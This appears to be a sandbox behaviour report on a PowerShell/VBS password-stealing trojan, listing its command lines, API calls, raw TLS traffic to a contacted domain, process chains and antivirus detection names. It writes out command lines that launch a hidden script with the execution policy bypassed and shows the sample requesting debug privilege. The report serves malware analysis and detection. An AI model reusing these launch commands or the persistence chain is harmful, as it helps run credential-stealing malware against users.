file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\ProgramData\Document\Managing.ps1
cmdline powershell -ExecutionPolicy Bypass & C:\ProgramData\Document\Managing.ps1
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -ExecutionPolicy Bypass & C:\ProgramData\Document\Managing.ps1
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received U
Data received Q[ íÍ¢&J9UE©Ê[¬6AÕÀ2Å^DOWNGRD #VX_HY´™Kz†ndɤTìœjÞ´ü€•JÏ^qÓý/ ÿ
Data received  
Data received ý ú=0‚90‚!  ßtÄ] ]Û+^йW%ì´0  *†H†÷  0`1 0 UUS10U  DigiCert Inc10U www.digicert.com10URapidSSL TLS RSA CA G10 230810000000Z 240124235959Z010Ukbproducciones.com0‚"0  *†H†÷ ‚0‚ ‚¶¯®»GTbÃ<ñ µ<qêh„–GGiRþ+ʦOh7fä ¾JE X +í n‡+¡4Se$K¬^e~Ru©¦ä÷Hd/ÏÈÌf­6PX¯Ý¥Ï£ÿiÅm˘*‡¤Ó“Ø#jÓ:«±±}®d•dá]ð¸Üȇ¥eT¬XQ>äf„8N¯‘ LäJkDcô:ã kqÅs·}ŸzÁÕéÜ7Gªhm n¦(ԄÜÊîh@&”)Úì˜Èþ4L4`äö»Taxgq&-ë0NÉ1Èpð ܝPUBˆ`o û%ýìɚÑÂLÇÅA&ï¤ÌՍi„Áƒ£‚00‚,0U#0€ Ûl‚IJg ¸îzÄHRˆëV80UÁ†;F¤Ÿ"üÖn¤Ä‰­È›ç‘‘05U.0,‚kbproducciones.com‚www.kbproducciones.com0Uÿ 0U%0++0?U80604 2 0†.http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0>U 70503g 0)0'+http://www.digicert.com/CPS0v+j0h0&+0†http://status.rapidssl.com0>+0†2http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0 U00‚~ +Öy‚n‚jhvîÍÐdÕÛÎÅ\·´Í¢2‡F|¼ìÞÃQHYFqµ›‰àùµ“G0E!ÿtõíèÊc×@<êó»Ãcǂ[”ˆ^¿,hª9ßZ¨ pKčèWûSø«) ”èêWi¦“Lh' ¡ƒ&PvH°ãkÚ¦G4åjú0ëRËVÝ,Ù»¿«9؄s‰àùµÐG0E!¬¬ XÇ­;hùäñài ùU¾kÒ^ûäù­¿Qn)“ uy^¼J ‘:R‘VUpïàeªë!Zöïr…0ôvÚ¶¿k?µ¶"Ÿ›Â»\kèp‘ql»Q„…4½¤=0H×û«‰àùµ}G0E ç_M…qª¡ÆÝ1^Pl:ϝ…4%”‰Å¢0Æà!Åph½¸¯j_yBzý–Z p‘,Vw_#œÀ‡H@¦Ï[0  *†H†÷  ‚u֟Ä®zE%(‹«óÕÀ¿]HǤë›x¤FÓ­=Q@>lﺽØ„Þ ƒ`A,%òH¼`ù÷{F±¶ohKª{(µ~֍È9Ùûu›˜Ó¡ðàìõ"7Îi­Ç¿EÓõ îªß?//äXTP¹ôx81¶ŽÜˆ¬âž¡øØòÆx~] ÿÔñ÷¾¾:K) —9K8`ñea _S±=ÐòÒe÷€ãÞRjU3ʋo¦«V4ÂA`ñO;óRXãÅÙÊúGÏê ØêôÈnY¼u!®qJ¡õ¦<?Ix–1~ƒŠ:óÁ#"wY#ÑT–l XE°A8·0‚³0‚›  %”"Îف* N™RŠú0  *†H†÷  0a1 0 UUS10U  DigiCert Inc10U www.digicert.com1 0UDigiCert Global Root G20 171102122433Z 271102122433Z0`1 0 UUS10U  DigiCert Inc10U www.digicert.com10URapidSSL TLS RSA CA G10‚"0  *†H†÷ ‚0‚ ‚¿¹Y%D5â]PI àËüÚ%šg¦¢mãjŸÚ§ÜòÕ¦ ®˜^í‡7(>Æo\4~„ÒN£Ø€æLú¼w<àŽù`£‡‰P86²IAž©ÚÂPʬzÐy"<È7íK@·×NZnÎtè9­aÉ0ôË(­#˜ÁDLûðˆðSE2aÃm¡¥àã‹šÊ“åIaè¤î©oŸÈåÝy7’K®»G†úû²­!«æåù-EZ[õÌTrÄ*guëyºÏüœÇú‹kÜò¼‚ÜíÄ)oé;LºÚõa5íƒÒŸÐ Œo„ O mÍö\!)¿ `ˆ.È$.ìq;u¼y$…£‚f0‚b0U Ûl‚IJg ¸îzÄHRˆëV80U#0€N"T •æãnæúú¹í90Uÿ†0U%0++0Uÿ0ÿ04+(0&0$+0†http://ocsp.digicert.com0BU;0907 5 3†1http://crl3.digicert.com/DigiCertGlobalRootG2.crl0cU \0Z07 `†H†ýl0*0(+https://www.digicert.com/CPS0  `†H†ýl0g 0g 0  *†H†÷  ‚D¥9¾ ÝkfJVæ`×3DŠ\ú‡39:]) …ÿŠ”ñ£¡j;2ECWX¡þãȃ¶FÑb :¸ìÛãuõO¾ç&Ž#Újý:‚ÂÛ¤g»½T²÷$ ·Yܶš‚‹¾ð¼µY‘Î@Ó‘ˆ°FóCÈ5ÿG‹˜‚>™ˆÔÿf†#¤h~  ¤7l°·4\„P‹q!— ÌýéŸE ³˜ÂËÊà]úà–½Wڈ¬.|(RüôúÔ?k«3ÑK’6º¦·¶bã‚a&¡qLo°BKͫҍK×]Üeœ×±ÿuvµzz1ÍhÄÒ]<O…Fô[|"òøþoÇ
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received O» 0°ï‰ÌíóËÌMàÁW¨lÖ x½^€Âa4¶Ùš:ÅFðt«6’­
Data sent yud÷̲ýÀ…ƬòMË®—‚;u ŽÃ™Ú‘u+šJ/5 ÀÀÀ À 284ÿwww.kbproducciones.com  
Data sent  OU&g'YEA@)ñӇ©bþÁäە‚®ûôÊh ]ÎèH³|Súù½g܏$c@ƒØV|ÝÝÏFâvµ£<3bÛ¦íb"BÏg*·Æõn®ç7Ãm`½øÿW·ÄŒ b㠉.,=´‹»¡²Ÿà›óûç¹tÈßh½~Å?½AwÛ¨™9¶¹WŸœ"ø>z¾])¶RÜGa¹‹æ)p¤×ñ×Ü£õĉÆá_h¦ Фr&„Z?ýÌDï󈽊çà¦"Ù?ì¹a>Yܯt©À@uT‚Xù¬(Â)#µÃ^ºh›J$ÅRH…Œ!f0Ð%Æ°•ÇŸ!¹;°î}\l(2IÀ8ˆ©¾»¸ÑÆFˆc¾,.Í;rL\FÑB$æè»F
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
file C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
file C:\ProgramData\Document\sChildKey.vbs
DrWeb VBS.DownLoader.2305
Sangfor Trojan.Generic-PS.Save.721ff762
Arcabit Trojan.PWS.Agent.SVN
ESET-NOD32 PowerShell/Agent.YT
Cynet Malicious (score: 99)
BitDefender Trojan.PWS.Agent.SVN
MicroWorld-eScan Trojan.PWS.Agent.SVN
Emsisoft Trojan.PWS.Agent.SVN (B)
F-Secure Trojan.TR/PShell.Dldr.G2
VIPRE Trojan.PWS.Agent.SVN
FireEye Trojan.PWS.Agent.SVN
Ikarus Trojan.PowerShell.Agent
Avira TR/PShell.Dldr.G2
GData Trojan.PWS.Agent.SVN
ALYac Trojan.PWS.Agent.SVN
MAX malware (ai score=80)
Time & API Arguments Status Return Repeated

send

 buffer: yud÷̲ýÀ…ƬòMË®—‚;u ŽÃ™Ú‘u+šJ/5 ÀÀÀ À 284ÿwww.kbproducciones.com  
socket: 1420
sent: 126
1 126 0

send

 buffer:  OU&g'YEA@)ñӇ©bþÁäە‚®ûôÊh ]ÎèH³|Súù½g܏$c@ƒØV|ÝÝÏFâvµ£<3bÛ¦íb"BÏg*·Æõn®ç7Ãm`½øÿW·ÄŒ b㠉.,=´‹»¡²Ÿà›óûç¹tÈßh½~Å?½AwÛ¨™9¶¹WŸœ"ø>z¾])¶RÜGa¹‹æ)p¤×ñ×Ü£õĉÆá_h¦ Фr&„Z?ýÌDï󈽊çà¦"Ù?ì¹a>Yܯt©À@uT‚Xù¬(Â)#µÃ^ºh›J$ÅRH…Œ!f0Ð%Æ°•ÇŸ!¹;°î}\l(2IÀ8ˆ©¾»¸ÑÆFˆc¾,.Í;rL\FÑB$æè»F
socket: 1420
sent: 326
1 326 0
parent_process powershell.exe martian_process "C:\Windows\System32\WScript.exe" "C:\ProgramData\Document\sChildKey.vbs"
parent_process powershell.exe martian_process C:\ProgramData\Document\sChildKey.vbs
parent_process wscript.exe martian_process powershell -ExecutionPolicy Bypass & C:\ProgramData\Document\Managing.ps1
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\ProgramData\Document\Managing.ps1
option -executionpolicy bypass value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe